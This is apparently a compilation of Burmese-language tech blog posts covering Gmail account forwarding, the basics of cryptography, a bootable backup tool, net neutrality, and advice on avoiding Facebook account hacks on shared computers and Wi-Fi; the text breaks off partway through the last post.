ေရြးခ်ယ္စရာ တစ္ခုခုကို ေရြးၿပီး ေအာက္မွာ Save Changes ကို ႏွိပ္ရပါမယ္။ ၿပီးေတာ့မွ Master email ID ဖြင့္ထားတဲ့ browser ကိုျပန္သြားၿပီး Add account ကိုႏွိပ္ရမယ္။

ရၿပီဆိုရင္ ေနာက္တဆင့္မွာ Yes... ေရြးစရာကို ေရြးၿပီး send verification ကို ထပ္ႏွိပ္ရပါမယ္။ ဒါက ေနာင္ဆံုး အတည္ၿပဳခ်က္ ရယူတာျဖစ္တယ္။

ခုနက slave email account ထဲကို ျပန္သြားၿပီး ေရာက္လာတဲ့ အတည္ျပဳခ်က္ code number ကို ယူၿပီး master account မွာ ထည့္လိုက္ေတာ့မွ ဒီလုပ္ေဆာင္ခ်က္ဟာ ေအာင္ျမင္မွာျဖစ္တယ္။ တကယ္အလုပ္ လုပ္မလုပ္ကိုေတာ့ စမ္းၾကည့္လိုက္ပါအံုး။ မရရင္ေတာ့ တေနရာရာမွာ မွားတာရွိလို႔ ျဖစ္မွာပါ။ မရရင္ ျပန္ေမးၾကည့္ လိုက္ပါေနာ္။

ဒီလိုနဲ႔ slave email ID(s) ထဲမွာ ၀င္လာသမွ် email အသီးသီးဟာ Master email account ထဲမွာခ်က္ခ်င္းေရာက္ေနၿပီး ဖတ္လို႔ရပါတယ္။ ျပန္ပို႔တဲ့ အခါမွာလည္း ႀကိဳက္တဲ့ email ID ႏွင့္ ျပန္ပို႔လို႔ ရပါတယ္။ Slave email ID ႏွင့္ Master account ထဲကေန email စာ အသစ္ ေရးဖို႔ဆိုရင္ Gmail ကိုသံုးတဲ့ အခ်ိန္မွာ standard version ႏွင့္ သံုးဖို႔လိုအပ္ပါတယ္။ From ဆိုတဲ့ ေနရာကေန ဘယ္ email ID ႏွင့္ ပို႔ခ်င္သလဲ ေရြးလို႔ရတယ္ေလ။

Standard version မွာ Functions ေတြပိုစံုတယ္ အင္တာနက္ ခ်ိတ္ဆက္မႈ အျမန္ႏုန္းလည္း ပိုေကာင္းဖို႔ လိုအပ္ပါတယ္။

အဲဒါကေတာ့ ကိုယ့္ email account အသီးသီးကုိ Master ID တစ္ခုထဲမွာ backup လုပ္တာျဖစ္တယ္။ အဲဒီ Master account ကိုလည္း တစ္ျခား ID သို႔ ထပ္ၿပီး Backup လုပ္လို႔ရပါေသးတယ္။
(burmait.net မွ ကူးယူေဖာ္ျပသည္။)

အျပည့္အစံု

Cryptography ရဲ႕ အဓိပၸာယ္


သတင္း အခ်က္အလက္လံုျခံဳေရး သိပၸံပညာကို ေခၚဆိုတဲ့ စကားလံုးျဖစ္ပါတယ္။ ဂရိစကားလံုးျဖစ္ပါတယ္။ ဂရိစကားလံုး kryptos ကဆင္းသက္လာတဲ့ ေ၀ါဟာရျဖစ္ျပီး၊ ထိန္ခ်န္ထားေသာ အဓိပၸာယ္ရပါတယ္။
cryptography ဟာ cryptology နဲ႕cryptanalysis စတဲ့ ဘာသာရပ္ေတြနဲ႕ နီးကပ္စြာ ဆက္စပ္လ်က္ ရွိပါတယ္။ cryptography မွာစာသားနဲ႕ ရုပ္ပံုေတြေပၚေစတဲ့ microdots နည္းပညာန႔ဲ သတင္းအခ်က္အလက္ေတြက္ို storage ျပဳလုပ္ျပီးေတာ့ျဖစ္ေစ၊ လႊဲေျပာင္းျပီးေတာ့ျဖစ္ေစ၊ ေျခရာ ေဖ်ာက္ႏိုင္တဲ့နည္းလမ္းေတြ ပါ၀င္ပါတယ္။

ကြန္ပ်ဴတာ နည္းပညာကို အဓိကသံုးစြဲလာတဲ့ ဒီေန႔ေခတ္မွာ cryptography နည္းပညာဟာ ပံုမွန္စာသား plaintext ေတြကို ciphertext အျဖစ္ေျပာင္းလဲေစတဲ့ (encryption) ေခၚ အခ်က္အလက္ လံုျခံဳေရးလုပ္ေဆာင္ခ်က္ ျဖစ္စဥ္န႔႔ဲ ဆက္ႏြယ္ေနတက္ပါတယ္။ ciphertext အျဖစ္ကေန plaintext အျဖစ္ျပန္ေျပာင္းတာကိုေတာ့ decryption လုိ႔ေခၚပါတယ္။
Cryptography ရဲ႕အဓိက အားသာခ်က္ (၄) ရပ္ကေတာ့
၁။ Confidentiality
သတင္းအခ်က္အလက္ကိုမသက္ဆိုင္သူ၊မရည္ညႊန္းခံရသူေတြနားမလည္ႏုိင္ျခင္း။
၂။ Integrity
သတင္း အခ်က္အလက္ကို ေပးဖုိ႕သူနဲဲ႕ ရည္ရြယ္ထားတဲ့ လက္ခံသူအႀကားမွာ storage ျပဳလုပ္မႈ၊ transit ျပဳလုပ္မႈေတြကို ၀င္ေရာက္ျပဳျပင္တာမ်ဳိးေတြကို ေထာက္လွမ္း စူးစမ္းႏုိင္ျခင္း။
၃။ Non-repudiation
သတင္းအခ်က္အလက္က္ို ေပးပို႕တဲ့သူဟာ ယင္း သတင္း အခ်က္အလက္ ကိုဖန္တီးျခင္း၊ ျပဳျပင္ ေျပာင္းလဲျခင္းေတြ ျပဳလုပ္ျပီးေနာက္ထပ္ အဆင့္တစ္ရပ္ကို ေရာက္ရွိခ်ိန္မွာ သူရဲ႕ ရည္ရြယ္ခ်က္က ိုု ျငင္းဆိုမႈမျပဳႏိုင္ျခင္း။
၄။ Authentication
သတင္းအခ်က္အလက္ ေပးပု႔ိသူနဲ႕ လက္ခံသူတို႕ ဟာ ၎တို႕ရဲ႕ ကိုယ္ေရး အခ်က္အလက္ေတြကို ကုိယ္စီကိုယ္ငွ အတည္ျပဳႏုိင္ျပီး၊ သတင္းအခ်က္အလက္ရဲ႕ ဇစ္ျမစ္ကိုလည္း အတည္ျပဳႏုိင္ျခင္း အစရွိတာေတြပါ၀င္ပါတယ္။

အထက္ေဖာ္ျပပါ စံသတ္မွတ္ခ်က္ ေတြအားလံုး (သို႕မဟုတ္) တစ္စိတ္တစ္ပိုင္းနဲ႕ ကိုက္ညီတဲ့ protocol ေတြနဲ႕ procedure ေတြကိို cryptosystem ေတြလို႕ေခၚဆိုပါတယ္။
Cryptosystem ေတြဟာ အမ်ားနားလည္သလုိ သခ်ၤာလုပ္ထံုး လုပ္နည္းေတြ၊ ကြန္ပ်ဴတာ ပရုိဂရမ္ေတြမွ်သာ မဟုတ္ပါဘူး။ ၎တို႕မွာမွန္းဆရခက္တဲ့ password ေတြေရြးခ်ယ္ရျခင္း၊ အသံုးမျပဳတဲ့ system ေတြကို log-off ျပဳလုပ္ျခင္း၊ အေရးႀကီးတဲ့ procedure ေတြကို မသက္ဆိုင္သူေတြနဲ႕ မေဆြးေႏြးျခင္း စတဲ့လူသားတစ္ဦးရဲ႕ လုပ္ေဆာင္ခ်က္ေတြကို လည္းေဆာင္ရြက္ေပးပါတယ္။ (burmait.net မွ ကူးယူေဖာ္ျပသည္။)

အျပည့္အစံု

ကြန္ပ်ဴတာ တစ္ခုလံုးကို recover ဘယ္လိုလုပ္မွာလဲ

မီးအား မမွန္တာေၾကာင့္ ျဖစ္ျဖစ္၊ virus ေတြကိုက္လို႔ ျပန္ဖြင့္ မရေတာ့တာေၾကာင့္ ျဖစ္ျဖစ္ ကြန္ပ်ဴတာကို ဘယ္လိုမွ ဖြင့္လို႔ မရေတာ့ဘူး၊
အထဲမွာလဲ အေရးႀကီးတဲ့ သတင္းအခ်က္အလက္ေတြ အမ်ားႀကီး ရွိေနတယ္ဆိုရင္ ဘယ္လိုလုပ္္မွာလဲ။

ေသခ်ာတာေတာ့ အဲဒီကြန္ပ်ဴတာကို format ခ်ရေတာ့မွာပဲ။ မခ်ခင္ တစ္ခ်က္ စဥ္းစားပါအံုး၊ လုပ္လို႔ရတဲ့ နည္းလမ္းေလးရွိတယ္။

အဲဒါကေတာ့ Redo Backup and Recovery ဟာ Backup Software ေလးေပါ့။ ဒီဟာေလးကို CD ႏွင့္ ျဖစ္ျဖစ္ Stick ႏွင့္ ျဖစ္ျဖစ္ ေဆာင္ထားရင္ လိုအပ္တဲ့အခါ အခ်ိန္ ၁၀ မိနစ္အတြင္း အေရးႀကီးတဲ့ data ေတြကို လံုျခံဳစိတ္ခ်ရတဲ့ ေနရာမွာ Backup လုပ္ၿပီးသား ျဖစ္မွာပါ။ RB & R က Bootable ျဖစ္တယ္။ Windows OS ျဖစ္ျဖစ္ Linux OS ျဖစ္ျဖစ၊္ ဘယ္ OS ႏွင့္ပဲ ျဖစ္ျဖစ္ သံုးလို႔ရတယ္ ၿပီးေတာ့ GPL လိုင္စင္ႏွင့္ ထုတ္ထားတာ ျဖစ္တဲ့အတြက္ေၾကာင့္ ကိုယ္ပိုင္ပဲ သံုးသံုး၊ လုပ္ငန္းမွာ အခေၾကးေငြ ယူၿပီးေတာ့ပဲ သံုးသံုး တရား၀င္ software ျဖစ္တယ္။

RB & R ဟာ install လုပ္စရာမလိုဘူး ထည့္လိုက္ၿပီး စက္ဖြင့္တာႏွင့္ Computer ရဲ႕ Hard disk ထဲကို ျပန္တင္လို႔ ရတယ္။ ကြန္ပ်ဴတာကို Network ခ်ိတ္လို႔ရသလို CD ႏွင့္ USB လည္း ထည့္လို႔ရတယ္။ Internet ပါ သံုးလို႔ရတယ္ ဖ်က္ၿပီးသား ဖိုင္ေတြကို ျပန္ၾကည့္လို႔ရသလို ျပန္ကူးထားလို႔ရတယ္။

ဒီ software ဟာ 75 MB ပဲရွိတဲ့အတြက္ေၾကာင့္ USB ႏွင့္ျဖစ္ျဖစ္၊ CD ႏွင့္ျဖစ္ျဖစ္ သိမ္းထားၿပီး ယူသြားလို႔ရတယ္။

ဘာေၾကာင့္ တျခား Backup Software ေတြထက္ ေကာင္းရသလဲဆိုေတာ့ GPL လိုင္စင္ႏွင့္ျဖစ္တာရယ္၊ လိုင္စင္အတြက္ေၾကာင့္ ကန္႔သတ္တာမ်ဳိး မရွိတာရယ္၊ ဘယ္ OS ႏွင့္ မဆို အသံုးျပဳႏိုင္တာရယ္၊ Hard disk ထဲကို username ေတြ password ေတြ မလိုဘဲနဲ႔ ၀င္လို႔ရတာရယ္၊ ၿပီးေတာ့ အခ်ိန္ ၁၀ မိနစ္ေလာက္ ႏွင့္ backup လုပ္လို႔ ရႏိုင္တာေၾကာင့္ျဖစ္တယ္။
(burmait.net မွ ကူးယူေဖာ္ျပသည္။)

အျပည့္အစံု

အင္တာနက္လြတ္လပ္မႈသေဘာ Net neutrality အေၾကာင္း

ကေန႔ကာလရဲ႕ နည္းပညာနဲ႔ဆက္သြယ္ေရးက႑ communictions sector မွာ မူ၀ါဒေရးရာနဲ႔ပတ္သက္လို႔ အျငင္းအခံုအျဖစ္ရဆံုး ေ၀ါဟာရဟာ net neutrality ဆိုတဲ့ စကားစုျဖစ္လို႔လာေနပါတယ္။
Net neutrality ဆိုတဲ့ေ၀ါဟာရမွာ net ကေတာ့ “အင္တာနက္ကြန္ရက္ႀကီး” တစ္ခုလံုးကိုရည္ၫႊန္းတာျဖစ္ၿပီး၊ neutrality ဆိုတာကိုေတာ့ “ဘက္မလိုက္မႈ၊ ၾကားေနမႈ” စတဲ့ အနက္သေဘာေတြနဲ႔သံုးၾကတာပါ။ ဒီစကားစုကို “အင္တာနက္ၾကားေနမႈ” လို႔လည္း ဟုိတစ္ပတ္က အင္တာနက္ေဆာင္းပါးတစ္ေစာင္မွာ စမ္းသပ္ျပန္ဆိုသံုးစြဲခဲ့ပါေသးတယ္။ ဒါေပမယ့္ စာဖတ္ပရိသတ္ကို အရည္လည္၊ သေဘာေပါက္ဖို႔ ခက္ေနဦးမွာပါ။ ဒါေၾကာင့္ဒီအင္တာဗ်ဴးမွာေတာ့ net neutrality ဆိုတာကို လက္ရွိအင္တာနက္အေရးအသားမ်ားေပၚမွာ သံုးစြဲေနတဲ့အနက္ရင္းနဲ႔ နီးစပ္မႈအရွိဆံုးျဖစ္ေအာင္၊ “အင္တာနက္လြတ္လပ္မႈသေဘာ” လို႔ ျပန္ဆုိလိုက္ပါတယ္။ ယခုေဖာ္ျပမယ့္ အေမးအေျဖေတြကေတာ့ net neutrality ဆိုတာဘာလဲဆိုတဲ့ ေမးခြန္းနဲ႔စထားတယ္။ Google Verizon တို႔ရဲ႕မၾကာမီက ပူးတြဲအဆိုျပခ်က္ ေပၚလစီခ်မွတ္သူေခါင္းေဆာင္မ်ားအတြက္ အင္တာနက္ကို ထိန္းခ်ဳပ္ဖို႔ကိစၥပါ၀င္သလို၊ AT & T, Comcast, Verizon တို႔လို service provider ကုမၸဏီႀကီးေတြနဲ႔ အင္တာနက္ကြန္ရက္ရဲ႕ အတားအဆီးမရွိ လြတ္လပ္မႈပင္ကိုယ္သေဘာထားကို ထိန္းသိမ္းခ်င္တဲ့ လစ္ဘရယ္အုပ္စုမ်ားရဲ႕အျငင္းအခံုေတြကိုပါ ေရာင္ျပန္ဟပ္ထားပါတယ္။

Q Net neutrality ဆိုတာ ဘာလဲ။ 
A ဒီေ၀ါဟာရရဲ႕အဓိပၸာယ္ကို ရွင္းရွင္းလင္းလင္းဖြင့္ဆို ေဖာ္ျပၾကတာေတာ့မရွိေသးဘူး။ ဒါေပမယ့္ လူေတာ္ေတာ္မ်ားမ်ားအတြက္ကေတာ့ ဒီေ၀ါဟာရရဲ႕အဓိပၸာယ္က “အင္တာနက္အသံုးျပဳသူေတြဟာ Web ေပၚက service နဲ႔ content ေတြကိုအကန္႔အသတ္မူမရွိဘဲ ခ်ိတ္ဆက္သံုးစြဲႏုိင္တယ္၊ သံုးသင့္တယ္” လို႔ပဲ ႐ိုး႐ိုးအဓိပၸာယ္ထြက္တယ္။ တျခားနည္းနဲ႔ေျပာရရင္ေတာ့ broadband service provider ေတြကို အင္တာနက္ဆက္သြယ္မႈကိုေႏွးေအာင္လုပ္ခြင့္ေပးတာ တစ္ခ်ိဳ႕ေသာ content ေတြကို ပိတ္ဆို႔ (block) လုပ္တာမ်ိဳးကို ခြင့္မျပဳသင့္ဘူးလို႔ဆိုတာပါ။ (အေမးအေျဖကအေရးႀကီးလို႔ မူရင္းကိုပါ တြဲလ်က္ေဖာ္ျပပါရေစ။ ဘာသာျပန္သူ) Q Whar is Net neutrality? A There is no clear definition of the phrase "Net neutrality". But to most people it simply means that Internet users should be able to have unfettered access to content and services on the web. In other words, broadband service providers should not be allowed to monkey with the traffic to block certain content or slow it down.

Q အင္တာနက္ကို ပြင့္လင္းလြတ္လပ္ေအာင္ open ျဖစ္ေအာင္ ထိန္းသိမ္းေပးထားတဲ့ ဥပေဒစည္းမ်ဥ္းစည္းကမ္းေတြ မရွိဘူးလား။ 
A မရွိပါ။ Broadband provider ေတြကို သူတို႔ရဲ႕ network ေတြေပၚမွာ ဘာလုပ္ႏုိင္၊ ဘာမလုပ္ႏုိင္ဘူးဆိုတာကို သီးသန္႔ေျပာထား၊ ေရးထားတဲ့ ဥပေဒသို႔မဟုတ္ အေရးယူေဆာင္ရြက္ႏုိင္တဲ့ စည္းမ်ဥ္းစည္းကမ္းေတြ တစ္ခါမွမရွိခဲ့ပါဘူး။ တစ္ခ်ိဳ႕ဥပေဒေတြကေတာ့ အဆိုုျပဳထားတုန္း၊ ဒါေပမယ့္ အားလံုးကလည္း ဒီအဆင့္မွာပဲ ပ်က္ကုန္တာပါ။ ဖက္ဒရယ္ဆက္သြယ္ေရးေကာ္မရွင္ (FCC) ကေတာ့ Net neutrality principle ဆိုၿပီး ေရးထားတာေတြရွိတယ္။ ဒါေပမယ့္ အဲဒါေတြကလည္း တရား၀င္စည္းမ်ဥ္းေတြရယ္ေတာ့ မဟုတ္ပါဘူး။ FCC ဟာယခုေတာ့ အခိုင္အမာေဆာင္ရြက္ႏုိင္၊ အေရးယူျပဌာန္းႏုိင္တဲ့ တရား၀င္ခ်မွတ္ထားတဲ့ ဥပေဒစည္းမ်ဥ္းေတြ ေရးဆြဲဖို႔လုပ္ေနပါတယ္။

Q Net neutrality အျငင္းအခံုကိစၥထဲမွာ Googleနဲ႔ Verizon တို႔ ဘာေၾကာင့္ပါ၀င္ေနတာလဲ။ 
A Google နဲ႔ Versizon တို႔ဟာ FCC န႔ဲ ဥပေဒျပဳအမတ္ေတြဆီမွာ အဆိုျပဳခ်က္ဥပေဒၾကမ္း proposal တစ္ခုရွိခဲ့ပါတယ္။ ဒါဟာ အဆိုျပဳခ်က္သက္သက္ပါပဲ။ FCC အာဏာပိုင္ေတြနဲ႔ ဥပေဒျပဳအမတ္ေတြကေတာ့ ဒီကိစၥနဲ႔ပတ္သက္လို႔ ဥပေဒၾကမ္းတရပ္ဆြဲႏုိင္ဖို႔ သူတို႔ရ႕ဲအဆိုျပဳေတာင္းဆိုခ်က္ေတြကို ထည့္သြင္းစဥ္းစားမလား၊ မစဥ္းစားဘူးလားဆိုတာ ဆံုးျဖတ္ရမွာပါ။ Google နဲ႔ Verizon Service provider ေတြဟာသူတို႔ရဲ႕ network ေတြေပၚမွာလည္ပတ္ေနတဲ့ အခ်ိဳ႕ေသာ appliction ေတြအတြက္ အပို၀န္ေဆာင္ခေကာက္ခံမလား၊ မေကာက္ခံဘူးလားဆိုတာပါ။ ၀ိုင္ယာလက္စ္ကြန္ရက္ ေတြကို Net neutrality စည္းမ်ဥ္းကေန ဖယ္ထုတ္သင့္၊ မသင့္ဆိုတာပါ။

Q ဒါဆို ဘာဥပေဒမွ ေလာေလာဆယ္မရွိေသးဘူးဆိုရင္၊ လက္ရွိကၽြန္ေတာ္တို႔သံုးေနတဲ့ အင္တာနက္ဆိုတာ မလြတ္လပ္ဘူးဆိုတဲ့သေဘာလား။ 
A ဒါလည္း “လြတ္လပ္တယ္” ဆိုတာကို ခင္ဗ်ားဘယ္လိုအဓိပၸာယ္ဖြင့္သလဲဆိုတဲ့အေပၚ မူတည္ပါတယ္။ စားသံုးသူအမ်ားစုကေတာ့ သူတို႔မွာ ဘာျပႆနာမွမရွိဘူးေျပာၾကတယ္။ သူတို႔ရဲ႕ broadband ေႏွးေအာင္လုပ္တာ သို႔မဟုတ္ ပိတ္ဆို႔ (block) တာ မရွိၾကပါဘူး။ သူတို႔ဟာအင္တာနက္ေပၚမွာ လြတ္လပ္စြာသြားႏုိင္ၿပီး မည္သည့္ အင္တာနက္အသံုးျပဳရတဲ့ application ကိုမဆို သူတို႔ရဲ႕ broadband connection ေတြေပၚမွာ လြတ္လပ္စြာသံုးႏုိင္ၾကပါတယ္။ ဗီဒီယိုေတြၾကည့္ႏုိင္တယ္။ Skype လို third party ၾကည့္ရင္ေတာ့ net ဆိုတာလြတ္လပ္တယ္ေပါ့။ ဒါေပမယ့္ဒါက service provider ေတြဟာ အင္တာနက္ traffic ကို မစီမံမခန္႔ခြဲဘူး။ ဦးစားေပးမလုပ္ေဆာင္ဘူးလို႔ ဆိုလိုတာေတာ့မဟုတ္ဘူး။ Broadband service provider ေတြဟာ ေျမေပၚမွာဖိုင္ဘာလိုင္း၊ ေၾကးနန္းလိုင္းေတြကေန သို႔မဟုတ္ ေလလႈိင္းကေနစသျဖင့္ ဘယ္လိုပဲ service ေပးေနသည္ျဖစ္ပါေစ၊ သူတို႔ဟာ ကိုယ့္ရဲ႕ network ေတြကိုစီမံႏုိင္ရပါမယ္။ အင္တာနက္ေပၚမွာ information ေတြကို သယ္ေဆာင္ပို႔ေပးျခင္းနဲ႔ပတ္သက္လို႔ အသံုးျပဳေနတဲ့ Internet Protocol ဆိုတာဟာလည္း အေကာင္းဆံုး အားထုတ္မႈတစ္ခုပါပဲ။ ၎က network တေလွ်ာက္မွာ information packet ေတြကိုပို႔ေပးတယ္။ ဒီ information ေတြအားလံုးဟာလည္း Speed အမ်ိဳးမ်ိဳး၊ တစ္ခါတစ္ေလ လမ္းေၾကာင္းအမ်ိဳးမ်ိဳးနဲ႔ သြားေနပါတယ္။ ဒီ packet အမ်ိဳးမ်ိဳးဟာလည္း သူတို႔ရဲ႕ပန္းတုိင္ေနရာကိုေရာက္ရင္ ျပန္စုစည္းရတယ္။ ဒါဟာ network ရင္းျမစ္ေတြအတြက္ အလြန္ထိေရာက္တဲ့ အသံုးျပဳမႈပါ။ ဒါေပမယ့္ ဟိုင္းေ၀းလမ္းေတြေပၚသြားေနတဲ့ ကားေတြလိုေပါ့။ တစ္ခ်ိဳ႕ packet ေတြဟာလည္း သြားေနစဥ္မွာ ပိတ္ဆို႔မႈျဖစ္တာေတြ ႀကံဳရတတ္ပါတယ္။ လူေတြကေတာ့ text-based packet ေတြေႏွာင့္ေႏွးတာကို သတိမထားမိတတ္ၾကပါဘူး။ ဒါေပမယ့္ အဲဒါေတြမွာ အခ်ိန္သတ္မွတ္ခ်က္နဲ႔ သြားရတဲ့ေဒတာေတြျဖစ္ၾကတဲ့ Voice call လို႔၊ Vidoe Stream လုပ္တာမ်ိဳးေတြလိုပါတယ္ဆိုရင္ ေႏွးေကြးတာ၊ ပိတ္ဆို႔မႈျဖစ္ေနတာကို ႀကံဳရမွာပါ။ ဒီေတာ့ ေဒတာေတြစီးဆင္းေနမႈအားလံုးကို အခ်ိန္မီ စနစ္တက်သြားလာေနေစဖို႔ network operator ေတြဟာ စီခံခန္႔ခြဲမႈနည္းေတြနဲ႔ တကၠႏိုလိုဂ်ီေတြကို ကားလမ္းေတြမွာ လမ္းျပရဲေတြကအဆင္ေျပေအာင္လုပ္ေပးသလိုမ်ိဳး လုပ္ေဆာင္ေပးရပါတယ္။ Network operator ေတြဟာ ဒီတကၠႏိုလိုဂ်ီေတြကို သံုးလာတာ ႏွစ္ေပါင္းမ်ားစြာၾကာခဲ့ပါၿပီ။ သူတို႔ရဲ႕ network ေတြမွာပိတ္ဆို႔မႈ traffic ေတြမ်ားလာေလ traffic management နည္းလမ္းေတြပါသံုးၿပီး ေျဖရွင္းေပးရေလပါပဲ။ AT & T နဲ႔ Verizon လိုကုမၸဏီမ်ိဳးေတြက ေျပာေနတာကလည္း သူတို႔ရဲ႕ network ေတြကိုထိန္းခ်ဳပ္ဖို႔ဆိုတာဟာ subscriber ေတြအားလံုးအတြက္ အဲဒီလို traffic ေတြမႀကံဳေအာင္ စနစ္တက်စီမံႏုိင္ေရးပါ။

Q ဒါဆို အင္တာနက္လြတ္လပ္မႈသေဘာ Net neutrality ကိုေထာက္ခံသူေတြက ဘာေတြကို ေၾကာက္ေနတာလဲ။ 
A ဒါနဲ႔ပတ္သက္လို႔ ပံုစံက်ဥပေဒစည္းမ်ဥ္းေတြမရွိဘဲ broadband provider ေတြက သူတို႔ရဲ႕ စြမ္းအားကို မတရားအသံုးခ်ၾကမွာ ေၾကာက္ၾကလို႔ပါ။ Traffic ျဖစ္ေနတာေတြကို ထိန္းခ်ဳပ္ဖို႔အတြက္ သူတို႔ရဲ႕ management technique ေတြကိုသံုးရမယ့္အစား၊ net ေပၚမွာ ၿပိဳင္ဘက္ provider ေတြရဲ႕ serviceေတြကို သံုးေနတဲ့ user ေတြရဲ႕ connection ေတြကို ေႏွာင့္ေႏွးေအာင္လုပ္မွာစိုးလို႔ပါ။ ဥပမာေျပာရရင္ ခင္ဗ်ားရဲ႕ broadband provider က video service ေပးေနတယ္ဆိုပါေတာ့။ ဒါဆိုရင္ ခင္ဗ်ားရဲ႕ကုမၸဏီက network ေပၚမွာေတာ့ ၿပိဳင္ဖက္ကုမၸဏီရဲ႕ video service ထက္ခင္ဗ်ားအတြက္ service ကိုပဲ ဦးတည္ေပးဖို႔ ႀကိဳးစားေကာင္းႀကိဳးစားေတာ့မွာပဲ။ ဒီလိုျဖစ္တာနဲ႔ အဲဒီၿပိဳင္ဘက္ကုမၸဏီရဲ႕ service ဟာလည္း ေႏွာင့္ေႏွးသြားၿပီး၊ ခင္ဗ်ားကုမၸဏီအတြက္ပဲ ပိုေကာင္းေတာ့မွာေပါ့။ ေနာက္ထပ္ေၾကာက္ၾကတာတစ္ခုကေတာ့ broadband service provider ေတြဟာ content နဲ႔ application developer ေတြနဲ႔ပူးေပါင္းၿပီး စာခ်ဳပ္ခ်ဳပ္ဆိုမွာ၊ netbased service အင္တာနက္အေျခခံ၀န္ေဆာင္မႈ အားလံုးတိုင္းဟာလည္း connection ပိုေကာင္းခ်င္ရင္ ေငြပိုေပးရမယ္ဆိုတာမ်ိဳးျဖစ္လာမွာကို ေၾကာက္ၾကတာပါ။ ဒါဆိုရင္လူတုိင္းသံုးႏုိင္တဲ့ public Internet ဟာ ေႏွးေကြးတဲ့၊ ဘာမွသံုးလို႔မရတဲ့ content ေတြပဲေပးေတာ့မွာေပါ့။

Q ဒါဆို net neutrality အျငင္းခံုဟာ ေနာက္ဆိုဘာျဖစ္လာႏုိင္မလဲ။ 
A ႏို၀င္ဘာမွာ အေမရိကန္ကြန္ရက္ေရြးေကာက္ပြဲေတြရွိတာမို႔ အဲဒီမတိုင္ခင္ေတာ့ ဘာမွျဖစ္ဦးမွာမဟုတ္ပါဘူး။ ေလာေလာဆယ္မွာေတာ့ FCC ေရာ service provider ေတြေရာ၊ ေထာက္ခံသူ၊ ဆန္႔က်င္သူေတြအားလံုးဟာ ၀ိုင္ယာလတ္စ္ network ေတြအတြက္ Net neutrality rule ေတြကို သံုးသပ္ဆင္ျခင္ေနရတုန္းပါ။ FCC ရဲ႕ဥကၠဌ ဂ်ဴးလီယပ္စ္ဂီနာေခ်ာစကီးကေတာ့ ဒီလိုေျပာထားတယ္။ “အားလံုးျမင္တဲ့အတုိင္းပါပဲ။ ကိစၥေတြကေတာ့ ေထြျပား႐ႈပ္ေထြးၿပီး၊ အေသးစိတ္က်ပါတယ္။ အေရးယူေဆာင္ရြက္ႏိုင္မယ့္ ဥပေဒေတြျပဌာန္းႏုိင္ဖို႔ အဆိုျပဳခ်က္ဥပေဒၾကမ္းတစ္ခုလုပ္တာေတာင္မွ အားနည္းခ်က္ကေလးေတြရွိေနၿပီး၊ လြတ္လပ္ပြင့္လင္းတဲ့ opern Internet ျဖစ္ေရး အေျခခံရည္မွန္းခ်က္ကို အႏၱရာယ္ျဖစ္ေစႏုိင္တာေတြ ပါေနဆဲျဖစ္ပါတယ္။”
Source: www.myanmarinternetjournal.com

အျပည့္အစံု

Thursday 20 December 2012

ေဖ့ဘုတ္အေကာင့္ ဟက္(Hack)ခံရလွ်င္...


Q: Can I get hacked in Facebook?

A : Facebook မွာ သတိမရွိတဲ့သူေတြသာ ဟက္ခံရတတ္ျမဲပါ။ အေကာင့္တစ္ခုုကိုု ဟက္တဲ့အပုုိင္းေတြက အမ်ားၾကီးရွိပါတယ္။ အေျခအေနအထားအရပါ။ ႏွစ္ပိုုင္းခဲြျပီးေျပာၾကတာေပါ့… ပထမတခုုက Public ပါ။ ေနာက္တခုုက Private ပါ၊ Public ဆိုုတာ လူအမ်ားတကာ Share လုုပ္တဲ့ဟာကိုု ေျပာတာပါ… (ဥပမာ … ကြန္ျပဳတာ ဆိုုင္။ ေက်ာင္းသံုုးကြန္ျပဳတာ။ ေနာက္ သူမ်ားကြန္ျပဳတာလိုု ့လဲေျပာလိုု ့ရပါတယ္) Private ဆိုုတာ ကိုုယ့္ဟာကိုုယ္ သံုုးတဲ့စက္ေပါ့ဗ်ာ…

တကယ္လိုု ့သာ ကြန္ျပဳတာ သံုုးသူဟာ ၁) Public ကိုု သံုုုးတဲ့သူဟာ.. သူ ့အေကာင့္ကိုု ၁၀၀% ဘယ္ေတာ့မွ secure မျဖစ္ပါဘူး… ဥပမာ အင္တာနက္ဆိုုင္ဆိုုပါေတာ့ အင္တာနက္ဆိုုင္က ကြန္ျပဳတာေတြဟာ ဘယ္ေတာ့ မွ ၁၀၀% clean မဟုုတ္ပါ။ သူတိုု ့က ပိုုက္ဆံရလွ်င္ သံုုးလိုု ့ရေအာင္ သတ္သတ္သာဖြင့္ထားၾကတာ သံုုးတာေတာင္ License ရွိတဲ့ ဟာေတြ မရွိတာကမ်ားပါတယ္။ ဒါေပမယ့္ လူတိုုင္းကိုုင္ လူတိုုင္းသံုုးေတာ့ဗ်ာ Keylogger ေတြခံရတတ္သလိုု Virus ေတြလည္းခံရတတ္ပါတယ္၊
အင္တာနက္ဆိုုင္ လက္ဖက္ရည္ဆိုုင္က WIFI ဘဲ သံုုးတယ္ဘဲထား… LAN/Wifi ကေနသံုုးတဲ့သူရဲ ့ Secure Session ေတြကိုု Hijack လုုပ္ပါက သင့္အေကာင့္ကိုု ယူသံုုးလိုု ့ရတတ္ပါတယ္၊ (Secure Session ကိုု Hijack ဆိုုေတာ့ Password ေတာ့ သူတိုု ့မရႏိုုင္ပါ… အေကာင့္ ၀င္ေနတဲ့အခ်ိန္ပိုုင္းသာ ရႏုုိင္ပါတယ္. အေကာင့္ထြက္သြားလွ်င္ သူတိုု ့လဲသံုုးလိုု ့မရပါ)
အင္တာနက္ဆိုုင္ကိုု ထိုုင္လွ်င္ေတာ့ ၁၀၀% Secure မျဖစ္ေပမဲ့ အင္တာနက္ဆုုိင္က လူေတြ ညစ္ပတ္ျပီး Keylogger/Malware ေတြ လုုပ္ထားရင္ေတာ့ ခံရတတ္ပါတယ္၊ ဒါေပမယ့္ တခ်ဳိ ့ေသာ Keylogger ေတြကေတာ့ UTF စာျဖစ္တဲ့ ျမန္မာစာေတြကိုု Log လုုပ္တာ အဆင္မေျပပါဘူး။ Keylog ရရင္လည္း ျပန္ျပီး Encoding လုုပ္ရပါတယ္။ သာမန္အဆင့္မရွိတဲ့ Script Kiddies ေတြက ျပန္ျပီး Encoding လုုပ္လိုု ့မရႏိုုင္ပါ၊ ဒါဆိုုရင္ ကိုုယ့္ Password ကိုု ျမန္မာစာျဖင့္ ေပးလိုု ့ရႏိုုုင္ပါတယ္၊ (သတိျပဳရန္ = တခါတေလ.. ကိုုယ့္ေျပာင္းထားေတာ့ ျမန္မာစာ Password နဲ ့ ရိုုက္တဲ့အခါ English နဲ ့၀င္လွ်င္ မွားတတ္ၾကတာေတြသတိျပဳပါ၊ 